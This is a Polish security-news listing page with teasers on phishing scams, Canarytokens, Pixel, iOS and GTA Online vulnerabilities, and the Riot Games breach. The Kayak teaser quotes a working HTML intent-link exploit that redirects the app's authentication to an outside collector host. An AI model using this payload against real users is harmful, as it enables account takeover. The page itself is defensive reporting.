Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Aktualności

Zwrot podatku? Fantastycznie! Tylko, że w tym przypadku pieniądze powędrują z Twojego konta na konto przestępcy [uwaga!]

26 stycznia 2023, 09:44 | W biegu | komentarzy 5
Zwrot podatku? Fantastycznie! Tylko, że w tym przypadku pieniądze powędrują z Twojego konta na konto przestępcy [uwaga!]

Jeden z czytelników poinformował nas o takim e-mailu, który otrzymał. Jak zwykle przestępcom coś się nie dotłumaczyło – patrz prawy dolny róg. Niektórzy rozpoznają scam po dość podejrzanym zwrocie 'Szanowny Obywatelu’. Ale powinniśmy przede wszystkim patrzyć na email, z którego ta wiadomość została wysłana: <infos[@]chabrouch.com> – nie wygląda to na…

Czytaj dalej »

Jak przygotować plik MS word lub PDF z trackerem? Po otworzeniu pliku przez postronną osobę, otrzymamy stosowny alert.

25 stycznia 2023, 13:36 | W biegu | komentarzy 9
Jak przygotować plik MS word lub PDF z trackerem? Po otworzeniu pliku przez postronną osobę, otrzymamy stosowny alert.

W zasadzie żadna to sztuka ;-) Takie dokumenty pozawala nam wygenerować serwis Canarytokens: Idea jest prosta – generujemy odpowiednią „podpuchę” – np. plik wordowy / excelowy / PDFa czy nawet QR kod. Dla podkręcenia atmosfery można taki plik nazwać np. hasla_loginy.docx Pełen zestaw możliwych do wygenerowania „tokenów” znajdziecie tutaj (łącznie…

Czytaj dalej »

Intrygująca podatność w googlowym telefonie, umożliwiająca zdobycie na nim roota

25 stycznia 2023, 12:38 | W biegu | komentarzy 5
Intrygująca podatność w googlowym telefonie, umożliwiająca zdobycie na nim roota

Zobaczcie na tę historię o dość intrygującym tytule: The “not-Google” bug in the “all-Google” phone. Badacz opisuje historię podatności w sterownikach do GPU na Pixelu 6, która umożliwia zdobycie z poziomu appki androidowej uprawnień na poziomie jądra OS (oraz oczywiście uprawnień root). Badacz wycelował (CVE-2022-38181) w sterowniki do GPU, dokładniej…

Czytaj dalej »

Jak nie ostrzegać o oszustwach? Zobaczcie tego SMSa:

25 stycznia 2023, 09:19 | W biegu | komentarzy 18
Jak nie ostrzegać o oszustwach? Zobaczcie tego SMSa:

Lekko zaniepokojony czytelnik sekuraka przesłał nam taką wiadomość: Co to za tajemniczy nadawca Alert? Link skracacz, jak to skracacz – prowadzący na pierwszy rzut oka… nie wiadomo dokąd. HTTP (zamiast HTTPS). A w końcu treść wiadomości, która nie wygląda jak oszustwo. Na dodatek link przekierowywał do tej (prawdziwej) strony. Oszustwo?…

Czytaj dalej »

„Klient banku umożliwił przestępcom dostęp do swojej bankowości internetowej oraz przekazał im kody sms, a mimo to nie musi spłacać zaciągniętej przez nich pożyczki”

24 stycznia 2023, 18:16 | W biegu | komentarzy 15
„Klient banku umożliwił przestępcom dostęp do swojej bankowości internetowej oraz przekazał im kody sms, a mimo to nie musi spłacać zaciągniętej przez nich pożyczki”

Tak zaczyna się wpis Jakuba Sikorskiego na LinkedIn. Sam scam przebiegał wg schematu jaki wielokrotnie opisywaliśmy – na przykład: Pani Marianna też zainteresowała się reklamą na Facebooku. Kliknęła, wypełniła potrzebne dokumenty. Skontaktował się ze mną pan (…), pytając, czy słyszałam kiedyś o kryptowalucie bitcoin. Logo wydawało mi się podobne do tego,…

Czytaj dalej »

Skucha w menadżerze haseł Bitwarden? Ustawionych mieli mało iteracji PBKDF2. Teoretyczny problem, a może trzeba się bać? ;-)

24 stycznia 2023, 09:41 | Aktualności | komentarzy 29
Skucha w menadżerze haseł Bitwarden? Ustawionych mieli mało iteracji PBKDF2. Teoretyczny problem, a może trzeba się bać? ;-)

Tutaj krótka analiza użycia algorytmu PBKDF2 w Bitwardenie. W skrócie – odpowiednie użycie PBKDF2 znacznie zwiększa czas łamania głównego hasła do menadżera, w przypadku gdyby doszło do hipotetycznego ataku na jego infrastrukturę IT (podobnie jak miało to miejsce w przypadku LastPass). Ale żeby wszystko działało zgodnie z zamierzeniami, potrzebna jest…

Czytaj dalej »

Exploit na GTA Online. Można przejmować konto? Może nawet cały komputer innych graczy? (RCE)

24 stycznia 2023, 09:24 | W biegu | 0 komentarzy
Exploit na GTA Online. Można przejmować konto? Może nawet cały komputer innych graczy? (RCE)

Coś jest na rzeczy, bo Rockstar wystosował właśnie pewnego rodzaju oświadczenie na Twitterze: potential new exploits, ale zamierzamy je rozwiązać w „planowanej aktualizacji bezpieczeństwa”. No to potencjalne, czy nie? ;-) Zaczęło się najprawdopodobniej od tego wątku: Może to oznaczać możliwość zdalnego dostępu do konta ofiary i spowodowanie np. zabanowania tego…

Czytaj dalej »

Apple udostępnia nową wersje iOS (16.3) z poprawkami bezpieczeństwa. Przez wejście na spreparowaną stronę można było zainfekować telefon

23 stycznia 2023, 21:26 | W biegu | komentarzy 7
Apple udostępnia nową wersje iOS (16.3) z poprawkami bezpieczeństwa.  Przez wejście na spreparowaną stronę można było zainfekować telefon

W skrócie – warto jak najszybciej przejść na wersję iOS 16.3. Mamy tu całkiem sporą liczbę poprawek bezpieczeństwa, w tym korektę dwóch błędów umożliwiających wykonanie kodu na telefonie (RCE) po odwiedzeniu zainfekowanej strony webowej: Processing maliciously crafted web content may lead to arbitrary code execution. Warto też zaznaczyć, że Apple…

Czytaj dalej »

Czy z jakiegoś serwisu ciekną dane kart kredytowych? Canarytokens umożliwia stworzenie specjalnej, fejkowej karty…

23 stycznia 2023, 09:46 | W biegu | 0 komentarzy
Czy z jakiegoś serwisu ciekną dane kart kredytowych? Canarytokens umożliwia stworzenie specjalnej, fejkowej karty…

Nowa funkcja jest obecnie w wersji beta i budzi na tyle duże zainteresowanie, że obecnie wchodząc na serwis https://canarytokens.org/generate i wybierając wygenerowanie numeru karty kredytowej, możemy spotkać się z takim komunikatem: Jeśli z kolei już się uda, otrzymamy tego typu numer: W założeniu mogę wygenerować dużą liczbę takich kart, autoryzacja…

Czytaj dalej »

Socjohackerzy wbili się do infrastruktury Riot Games. „Mamy tymczasowe problemy z dostarczeniem nowego contentu”.

21 stycznia 2023, 14:48 | W biegu | komentarzy 10
Socjohackerzy wbili się do infrastruktury Riot Games. „Mamy tymczasowe problemy z dostarczeniem nowego contentu”.

Firma znana chyba przede wszystkim z hitu League of Legends poinformowała o incydencie na Twitterze: Poza tym, że użyto socjotechniki, niewiele więcej wiemy o incydencie. Warto jednak przypomnieć relatywnie niedawną akcję z kradzieżą kodów źródłowych Electronic Arts. W tym ostatnim przypadku historia była prosta (i również polegała na zaprzęgnięciu socjo):…

Czytaj dalej »

Klikasz na telefonie w linka i masz przejęte konto w appce mobilnej Kayaka

21 stycznia 2023, 09:26 | W biegu | komentarze 4
Klikasz na telefonie w linka i masz przejęte konto w appce mobilnej Kayaka

Parę miesięcy temu pisaliśmy o ciekawej podatności w appce mobilnej Tiktoka, a teraz świeżo załatana podatność w appce serwisu Kayak. Idąc od końca – wystarczyło podrzucić ofierze linka do strony, na której hostowany był tego typu exploicik (specyficznie przygotowany link): <!DOCTYPE html> <html> <body> <a id=”exploit” href=”jakis_intent://externalAuthentication#Intent;scheme=kayak;package=com.kayak.android;component=com.kayak.android.web.ExternalAuthLoginActivity;action=android.intent.action.VIEW;S.ExternalAuthLoginActivity.EXTRA_REDIRECT_URL=https://jsfl9yn414bp1z2sujwfjsj3ruxlla.burpcollaborator.net;end”>Exploit</a>; </body> </html> Jeśli…

Czytaj dalej »

Ciekawy sposób na ukrywanie scamowych linków na LinkedIn – zobaczcie ten przypadek.

20 stycznia 2023, 16:14 | W biegu | 0 komentarzy
Ciekawy sposób na ukrywanie scamowych linków na LinkedIn – zobaczcie ten przypadek.

Świeży mini case study, o którym poinformował nas czytelnik: Gdzie prowadzi ten wpis? Na pierwszy rzut oka wygląda, że do polsatnews.pl. Jeśli przypatrzycie się zrzutowi powyżej – nie ma tam żadnej literówki. Jeśli klikniecie w linka, wylądujecie… ze sporym prawdopodobieństwem na (prawdziwej) stronie www.polsatnews.pl Gdzie więc tutaj jest scam? W…

Czytaj dalej »

Wrocław. Ktoś rozkleja plakaty z takim kodem QR… „zbiór informacji o obywatelach Ukrainy”. Link prowadzi do Proton Drive…

20 stycznia 2023, 14:38 | Aktualności | komentarze 22
Wrocław. Ktoś rozkleja plakaty z takim kodem QR… „zbiór informacji o obywatelach Ukrainy”. Link prowadzi do Proton Drive…

Jeden z czytelników przesłał nam dzisiaj rano takie zdjęcie: Z ciekawostek – tutaj lokalizacja tego miejsca na Google Street View: Gdzie prowadzi QR kod? Do adresu: drive.proton[.]me (usługa storage cloudowego od Protona). Tam z kolei plik .doc: oświadczenie_o_cudzoziemcach_przebywających_w_rp.doc wyglądający mniej więcej tak: Czy plik jest złośliwy? Wygląda na to, że…

Czytaj dalej »